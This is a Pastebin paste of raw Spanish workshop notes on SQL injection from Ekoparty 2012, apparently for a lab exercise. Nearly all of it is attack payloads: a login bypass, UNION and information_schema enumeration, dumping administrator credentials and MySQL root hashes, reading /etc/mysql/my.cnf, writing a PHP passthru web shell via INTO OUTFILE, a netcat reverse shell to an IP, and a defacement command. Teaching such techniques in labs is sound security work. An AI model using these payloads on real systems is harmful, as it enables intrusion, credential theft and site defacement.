Advertisement
Guest User

Ekoparty 2012 - SQLi Workshop

a guest
Sep 21st, 2012
1,465
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.55 KB | None | 0 0
  1. ------------------------------------------------------------------------------------
  2. Notas sueltas (sin filtrado ni limpieza)
  3. Workshop SQL Injection en la Ekoparty 2012
  4. Matias Katz
  5. Mkit Argentina
  6. matias@matiaskatz.com
  7. @matiaskatz
  8. www.matiaskatz.com
  9.  
  10. Ni Mkit Argentina ni Matias Katz se hacen responsables del uso de esta informacion
  11. ------------------------------------------------------------------------------------
  12.  
  13. 10.1.8.4
  14.  
  15. seleccionar tabla usuarios donde user=$user y pass=$pass
  16. si trajo al menos 1 registro Todo bien
  17.  
  18. user='' OR '1'='1' AND pass='' OR '1'='1'
  19.  
  20. hoy es sabado o 1 es 1 y estamos en julio o 1 es 1
  21.  
  22. articulo=$id union select null
  23.  
  24.  
  25. Usuarios y contrasenas
  26.  
  27. tabla
  28. campos
  29. motor bd
  30.  
  31. -------------------------------------
  32.  
  33.  
  34. MOSTRAR en pantalla los res.
  35.  
  36.  
  37. group_concat(column_name) from information_schema.columns
  38.  
  39.  
  40. target:administradores
  41.  
  42.  
  43. Stock: id,usuario,password,email,nombre
  44.  
  45. select group_concat(usuario),group_concat(password),group_concat(email) from administradores
  46.  
  47.  
  48.  
  49. select 1,2, load_file('/etc/mysql/my.cnf')
  50.  
  51. select 1,user,password from mysql.user where user='root'
  52.  
  53. mysql.user
  54.  
  55. user
  56. password
  57.  
  58.  
  59.  
  60. DVWA
  61.  
  62. $var=mysql_real_escape_string($var);
  63.  
  64. char(xx,yy,zz)
  65. char(xx) + char(yy)
  66. 0xab3f4467
  67.  
  68.  
  69. select 'blablabla' into outfile '/public_html/bla.txt'
  70.  
  71. <? passthru('uname -a'); ?>
  72.  
  73. nc -e /bin/sh 10.1.8.34 9988
  74.  
  75. echo "<font size=20>HACKED!!!</font>" > index.html
  76.  
  77.  
  78. ------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement